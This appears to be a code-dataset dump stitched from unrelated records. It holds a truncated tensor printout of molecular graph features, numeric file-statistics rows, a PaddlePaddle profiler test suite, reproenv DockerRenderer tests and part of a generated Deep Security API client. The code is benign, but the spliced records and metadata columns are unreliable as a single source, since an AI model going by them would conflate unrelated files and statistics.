[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]]]),
bond_features=FloatTensor([[[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]],
[[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]]),
relative_matrix=FloatTensor([[[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 1., 0.],
[0., 0., 1., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 1., 1.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.]]],
[[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]]),
distance_matrix=FloatTensor([[[1.0000e+06, 1.0000e+06, 1.0000e+06, 1.0000e+06, 1.0000e+06],
[1.0000e+06, 0.0000e+00, 1.4973e+00, 2.4696e+00, 3.8585e+00],
[1.0000e+06, 1.4973e+00, 0.0000e+00, 1.3390e+00, 2.4696e+00],
[1.0000e+06, 2.4696e+00, 1.3390e+00, 0.0000e+00, 1.4973e+00],
[1.0000e+06, 3.8585e+00, 2.4696e+00, 1.4973e+00, 0.0000e+00]],
[[1.0000e+06, 1.0000e+06, 1.0000e+06, 0.0000e+00, 0.0000e+00],
[1.0000e+06, 0.0000e+00, 1.2195e+00, 0.0000e+00, 0.0000e+00],
[1.0000e+06, 1.2195e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00],
[0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00],
[0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]]]),
y=None, batch_size=2)
| 52.618919
| 120
| 0.162823
| 2,164
| 19,469
| 1.457024
| 0.020795
| 0.999049
| 1.384396
| 1.697431
| 0.84491
| 0.805899
| 0.798605
| 0.78687
| 0.783698
| 0.762766
| 0
| 0.325349
| 0.59474
| 19,469
| 369
| 121
| 52.761518
| 0.074271
| 0
| 0
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009524
| 0
| 0.009524
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
5029d73929e9e346f38fbf7674758de36780c750
| 9,578
|
py
|
Python
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 14
|
2020-03-04T07:52:07.000Z
|
2022-02-14T01:39:14.000Z
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 19
|
2020-03-04T03:52:10.000Z
|
2021-12-23T07:02:07.000Z
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 26
|
2020-03-04T05:39:09.000Z
|
2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test static profiler."""
import paddle.fluid as fluid
import paddle.fluid.profiler as profiler
import numpy as np
import os
def test_profiler():
"""
test profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with profiler.profiler('CPU', 'total', './profile') as prof:
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
if os.path.exists("./profile"):
assert True
else:
assert False
def test_profiler1():
"""
test profiler with sorted_key = 'total', 'calls', 'max', 'min', 'ave'
:return:
"""
sorted_key = 'calls'
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with profiler.profiler('CPU', sorted_key, './profile') as prof:
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler():
"""
test start_profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('CPU')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler1():
"""
test start_profiler state=GPU
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('GPU')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler2():
"""
test start_profiler state=All
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('All')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler3():
"""
test start_profiler state=nothing
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
try:
profiler.start_profiler('nothing')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
except ValueError as e:
print(e)
assert True
def test_reset_profiler():
"""
test reset profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('All')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
for iter in range(10):
if iter == 2:
profiler.reset_profiler()
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
| 35.738806
| 80
| 0.545939
| 1,074
| 9,578
| 4.758845
| 0.137803
| 0.060262
| 0.086284
| 0.049305
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0.824692
| 0
| 0.031415
| 0.32867
| 9,578
| 267
| 81
| 35.872659
| 0.763453
| 0.133118
| 0
| 0.87766
| 0
| 0
| 0.05617
| 0
| 0
| 0
| 0
| 0
| 0.069149
| 1
| 0.037234
| false
| 0
| 0.021277
| 0
| 0.058511
| 0.005319
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
505282960b806fdc6f5963fe0a75f36963b9ed6a
| 7,465
|
py
|
Python
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | 1
|
2021-01-06T21:29:21.000Z
|
2021-01-06T21:29:21.000Z
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | 8
|
2021-01-10T19:10:51.000Z
|
2021-01-22T04:14:40.000Z
|
reproenv/tests/test_renderers_docker.py
|
kaczmarj/reproenv
|
a2306a2c79df8415ee0eebf02c46629dbf6260e0
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from reproenv.exceptions import RendererError
from reproenv.renderers import DockerRenderer
from reproenv.template import Template
def test_docker_renderer_add_template():
r = DockerRenderer("apt")
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello\necho world",
"arguments": {
"required": [],
"optional": [],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
# Not a Template type.
with pytest.raises(
RendererError, match="template must be an instance of 'Template' but got"
):
r.add_template(d, method="binaries")
# Invalid method
with pytest.raises(
RendererError, match="method must be 'binaries', 'source' but got 'fakemethod"
):
r.add_template(Template(d), method="fakemethod")
# Test apt.
r.add_template(Template(d), method="binaries")
assert len(r._parts) == 2
assert r._parts[0] == 'ENV foo="bar"'
assert (
r._parts[1]
== """RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello \\
&& echo world"""
)
# Test yum.
r = DockerRenderer("yum")
r.add_template(Template(d), method="binaries")
assert len(r._parts) == 2
assert r._parts[0] == 'ENV foo="bar"'
assert (
r._parts[1]
== """RUN yum install -y -q \\
python \\
&& yum clean all \\
&& rm -rf /var/cache/yum/* \\
&& echo hello \\
&& echo world"""
)
# Test required arguments.
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello {{ self.name }}",
"arguments": {
"required": ["name"],
"optional": [],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
r = DockerRenderer("apt")
r.add_template(Template(d, binaries_kwds=dict(name="Bjork")), method="binaries")
assert (
str(r)
== """ENV foo="bar"
RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello Bjork"""
)
d = {
"name": "foobar",
"binaries": {
"urls": {"1.0.0": "foobar"},
"env": {"foo": "bar"},
"instructions": "echo hello {{ self.name | default('foo') }}",
"arguments": {
"required": [],
"optional": ["name"],
},
"dependencies": {"apt": ["curl"], "debs": [], "yum": ["python"]},
},
}
r = DockerRenderer("apt")
r.add_template(Template(d), method="binaries")
assert (
str(r)
== """ENV foo="bar"
RUN apt-get update -qq \\
&& apt-get install -y -q --no-install-recommends \\
curl \\
&& rm -rf /var/lib/apt/lists/* \\
&& echo hello foo"""
)
def test_docker_render_from_instance_methods():
d = DockerRenderer("apt")
d.from_("alpine")
assert str(d) == "FROM alpine"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
assert str(d) == "FROM alpine AS builder"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
assert str(d) == "FROM alpine AS builder\nARG FOO"
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]"""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin\""""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg\""""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar"""
)
d = DockerRenderer("apt")
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
RUN test "$(getent passwd nonroot)" \\
|| useradd --no-user-group --create-home --shell /bin/bash nonroot
USER nonroot"""
)
d = DockerRenderer("apt", users={"root", "nonroot"})
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
d.workdir("/opt/foobar")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
USER nonroot
WORKDIR /opt/foobar"""
)
d = DockerRenderer("apt", users={"root", "nonroot"})
d.from_("alpine", as_="builder")
d.arg("FOO")
d.copy(
["foo/bar/baz.txt", "foo/baz/cat.txt"], "/opt/", from_="builder", chown="neuro"
)
d.env(PATH="$PATH:/opt/foo/bin")
d.label(ORG="myorg")
d.run("echo foobar")
d.user("nonroot")
d.workdir("/opt/foobar")
d.run_bash("source activate")
assert (
str(d)
== """\
FROM alpine AS builder
ARG FOO
COPY --from=builder --chown=neuro ["foo/bar/baz.txt", \\
"foo/baz/cat.txt", \\
"/opt/"]
ENV PATH="$PATH:/opt/foo/bin"
LABEL ORG="myorg"
RUN echo foobar
USER nonroot
WORKDIR /opt/foobar
RUN bash -c 'source activate'"""
)
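# --- Hedged usage sketch (appended; not part of the original test module) ---
# The assertions above already pin down the public surface: DockerRenderer accumulates
# Dockerfile "parts" via from_/arg/copy/env/label/run/user/workdir/run_bash and str() joins
# them. The helper below only reuses calls exercised by the tests; the import location of
# DockerRenderer is assumed to be whatever this test module already imports.
def _example_render_dockerfile():
    r = DockerRenderer("apt")
    r.from_("alpine", as_="builder")
    r.env(PATH="$PATH:/opt/foo/bin")
    r.run("echo foobar")
    r.user("nonroot")
    return str(r)  # multi-line Dockerfile text, one instruction per part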
| 25.83045
| 87
| 0.521902
| 932
| 7,465
| 4.127682
| 0.125536
| 0.032753
| 0.057187
| 0.060827
| 0.81674
| 0.784767
| 0.770211
| 0.742657
| 0.732779
| 0.731999
| 0
| 0.002748
| 0.268855
| 7,465
| 288
| 88
| 25.920139
| 0.702089
| 0.010717
| 0
| 0.746154
| 0
| 0.015385
| 0.488278
| 0.029679
| 0
| 0
| 0
| 0
| 0.069231
| 1
| 0.007692
| false
| 0.003846
| 0.015385
| 0
| 0.023077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acdeb5cbb9e00c545f90adf201bd7eca9a4596e3
| 28,892
|
py
|
Python
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/computer_intrusion_prevention_application_type_details_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class ComputerIntrusionPreventionApplicationTypeDetailsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def describe_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Describe an intrusion prevention application type # noqa: E501
Describe an intrusion prevention application type including computer-level overrides. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
return data
def describe_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Describe an intrusion prevention application type # noqa: E501
Describe an intrusion prevention application type including computer-level overrides. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `describe_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `describe_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_intrusion_prevention_application_types_on_computer(self, computer_id, api_version, **kwargs): # noqa: E501
"""List intrusion prevention application types # noqa: E501
